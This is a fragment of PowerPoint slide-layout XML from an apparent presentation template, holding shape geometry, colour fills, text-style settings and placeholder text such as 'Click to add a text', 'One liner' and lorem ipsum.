            <a:off x="13981136" y="7603641"/>
            <a:ext cx="4306864" cy="3552069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY0" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX1" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY1" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX2" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 3277537"/>
              <a:gd name="connsiteX3" fmla="*/ 1848144 w 3973996"/>
              <a:gd name="connsiteY3" fmla="*/ 1227313 h 3277537"/>
              <a:gd name="connsiteX4" fmla="*/ 1588675 w 3973996"/>
              <a:gd name="connsiteY4" fmla="*/ 1377110 h 3277537"/>
              <a:gd name="connsiteX5" fmla="*/ 13375 w 3973996"/>
              <a:gd name="connsiteY5" fmla="*/ 3224281 h 3277537"/>
              <a:gd name="connsiteX6" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY6" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX7" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY7" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX8" fmla="*/ 12888 w 3973996"/>
              <a:gd name="connsiteY8" fmla="*/ 3226227 h 3277537"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY9" fmla="*/ 3277537 h 32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73996" h="3277537">
                <a:moveTo>
                  <a:pt x="0" y="3277537"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3973997" y="3277537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973997" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848144" y="1227313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1588675" y="1377110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="952281" y="1755737"/>
                  <a:pt x="269197" y="2269569"/>
                  <a:pt x="13375" y="3224281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13375" y="3224525"/>
                  <a:pt x="13375" y="3225011"/>
                  <a:pt x="13132" y="3225254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13132" y="3225254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13132" y="3225254"/>
                  <a:pt x="13132" y="3225984"/>
                  <a:pt x="12888" y="3226227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8268" y="3243493"/>
                  <a:pt x="4377" y="3260515"/>
                  <a:pt x="0" y="3277537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 w="2052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2880" tIns="182880" rIns="182880" bIns="18288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876300"/>
            <a:ext cx="16535400" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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  <a:br>
              <a:rPr lang="en-US"/>
            </a:b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D9EDF35-5E2D-F730-672F-A0304BDF47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76300" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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0FC6BA4-F2FE-10F8-1E56-608C50CFCABA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456520" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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6AF3544-FEF4-D0DE-603E-CBB69039779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036740" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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B7B62AA-2FA7-BF6A-48B8-CCCF96A95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07045" y="9379676"/>
            <a:ext cx="2279055" cy="45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50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AF9B2761-4C48-23D8-0538-F012E2CAD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0" y="2322847"/>
            <a:ext cx="8267700" cy="1431256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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4000" y="4333953"/>
            <a:ext cx="8267700" cy="2131353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/>
            </a:lvl1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eros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2621ABF-86CE-8225-0608-1C5CA43FF4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543175" y="1557338"/>
            <a:ext cx="5133975" cy="72294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412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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="82677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4937" y="3286203"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="3286202"/>
            <a:ext cx="7210425" cy="4352847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4000" b="1"/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361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10150" y="876300"/>
            <a:ext cx="82677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4937" y="3286203"/>
            <a:ext cx="7210425" cy="4352847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sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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adfereipiscing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>
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donec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D67D43AA-3D80-D4A5-82B5-91DC499B59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5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="3286202"/>
            <a:ext cx="7210425" cy="4352847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sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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691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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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10150" y="876300"/>
            <a:ext cx="8267700" cy="580711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4937" y="4451812"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1"/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 sz="3000"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="4451811"/>
            <a:ext cx="7210425" cy="4352847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3000" b="1"/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 sz="3000"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5724597B-F7B7-A46A-AFF4-BC99CDDED8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4936" y="2092125"/>
            <a:ext cx="15478127" cy="1977458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill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211010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text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10150" y="876300"/>
            <a:ext cx="8267700" cy="580711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4937" y="4451812"/>
            <a:ext cx="7210425" cy="4352847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sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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 sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B017A-7671-6A44-E654-19140D0A1E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72640" y="4451811"/>
            <a:ext cx="7210425" cy="4352847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xmlns="" r:embed="rId3"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
              </a:buBlip>
              <a:defRPr sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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 sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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>
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aliquetfe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2D0EBB7B-5D79-F27E-A0C8-5E7089EB64D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7" name="Zástupný objekt pre text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5724597B-F7B7-A46A-AFF4-BC99CDDED8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4936" y="2092125"/>
            <a:ext cx="15478127" cy="1977458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill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728260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1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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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1846" y="3183856"/>
            <a:ext cx="11004309" cy="5266945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4000" b="1"/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378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1col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41847" y="876300"/>
            <a:ext cx="11004308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8B8E8366-6B62-A623-82C6-9FC9F1FFF3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1846" y="3183856"/>
            <a:ext cx="11004309" cy="5266945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4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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854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1col lon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B73BEE8A-F8C8-D8F2-AD31-2CAD920079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41847" y="876300"/>
            <a:ext cx="11004308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20633" y="2920508"/>
            <a:ext cx="14646735" cy="5793640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3000" b="1"/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 sz="3000"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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Donec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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="42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819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1col longer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41847" y="876300"/>
            <a:ext cx="11004308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025984A6-E242-DD61-24C1-8481329728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20633" y="2920508"/>
            <a:ext cx="14646735" cy="5793640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3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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 sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" defTabSz="13716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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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Donec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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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/>
            </a:pPr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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="42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474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- icon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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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25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3793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53793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2399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268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7708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 - turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E49ECB-3EBE-02ED-EAC6-8C937FD2923B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="7596553" cy="6730342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00BBC5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4427872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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870132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monitor, display, electronics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEF7425-51E0-6370-A3DE-D3698DE38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417AFF0-55AC-0FA2-51D1-B2E3A840C7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66925" y="933451"/>
            <a:ext cx="14173199" cy="800407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806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EF7425-51E0-6370-A3DE-D3698DE38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417AFF0-55AC-0FA2-51D1-B2E3A840C7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17488" y="574158"/>
            <a:ext cx="4253024" cy="9154633"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11490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7A65B8FF-5062-8165-A8BD-723954443B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6150" y="-514350"/>
            <a:ext cx="11315700" cy="1131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921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e Sta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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540BFBBE-4E79-238E-B01E-E15038D05942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="5516544" cy="4887510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00BBC5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A7C59AC1-B7D7-CCF7-59EA-ACAB8B8BEE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36899" b="45426"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9709598" y="4672484"/>
            <a:ext cx="8578398" cy="56145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876300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0D87EC6F-0D97-2B71-5625-7DD044F26FD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4346422"/>
            <a:ext cx="3533172" cy="18127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4EC1C45D-D7CF-E906-7EC2-5181A713B92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4346422"/>
            <a:ext cx="3533172" cy="18127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DB51807-A241-271D-DEC6-3DA50777FB4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4346422"/>
            <a:ext cx="3533172" cy="18127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F9CC0FA3-EAC6-C4D0-251E-98E309ADC25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6300" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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#1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4B93FCBC-5340-52BB-BAE2-020B9824D9E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10376" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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1Bn+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C5CA1994-2600-9721-3FE5-5597D44DB02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44452" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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400K+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B64DD8E8-711F-7128-397B-1140CA4EA10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878528" y="2528432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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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110M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AE5E1655-1C9E-EA2E-44EF-F771E50962C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76300" y="4346422"/>
            <a:ext cx="3533172" cy="18127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1EF98A0A-8454-8AC8-92FC-6295D77CCED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6300" y="6988470"/>
            <a:ext cx="16535400" cy="77009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Secondary headline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72C056ED-4A36-EF4A-16EB-528C14B028F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76300" y="7943850"/>
            <a:ext cx="3533172" cy="14668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41BF52C1-7ED9-8E4C-F000-095610720ED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5210376" y="7943850"/>
            <a:ext cx="3533172" cy="14668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00266EB9-BF63-5E41-6693-5A8564C8A07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544452" y="7943850"/>
            <a:ext cx="3533172" cy="14668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59D4150C-2ED5-FF23-AFCB-EECC5E896ADE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13878528" y="7943850"/>
            <a:ext cx="3533172" cy="14668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46A1E52-1B84-2D09-94CB-D32DE6D4D545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="6390752"/>
            <a:ext cx="165354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6046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r tech deck">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="004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9BEF7D-0E94-935B-4E7F-A3B4A5AF54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4427872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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3586755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E6CBC6A8-C4EC-E73E-CCBF-258E21523750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82276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0DE4229-D69F-B0DC-5EE5-1071970034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FB3CD3-4944-1C07-A2EC-98CD348E1FC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0" y="9410700"/>
            <a:ext cx="18288000" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="274320"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685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Image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210563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urquois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0DE4229-D69F-B0DC-5EE5-1071970034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07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urquoise with Headli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0DE4229-D69F-B0DC-5EE5-1071970034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50D499-608D-0875-D2DA-752EF6E8E6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6300" y="4427872"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="381000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2284345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urquoise with Headline an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0DE4229-D69F-B0DC-5EE5-1071970034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23A459B-6BBF-3BD9-47BD-D8E22D78B4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6300" y="920729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39B6E6-4E07-97BE-D1C4-5998259F661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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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2098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-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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414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217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objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1633441F-0A1E-03E0-2BCD-C54E25DD930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2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00BBC5">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A64BC7-62C8-E4B7-96D6-79FF3756DF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33297" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A46C4E-CA37-AF35-D0B4-99E299FB11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90294" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00717F">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88043803-0909-18DD-0BE9-61A3DFCD81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047290" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004B55">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> 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C174186-8D09-6BA8-890D-F71E699A9D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6300" y="920729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17712885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objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1633441F-0A1E-03E0-2BCD-C54E25DD930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2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00BBC5">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A64BC7-62C8-E4B7-96D6-79FF3756DF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33297" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096A1">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A46C4E-CA37-AF35-D0B4-99E299FB11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90294" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00717F">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
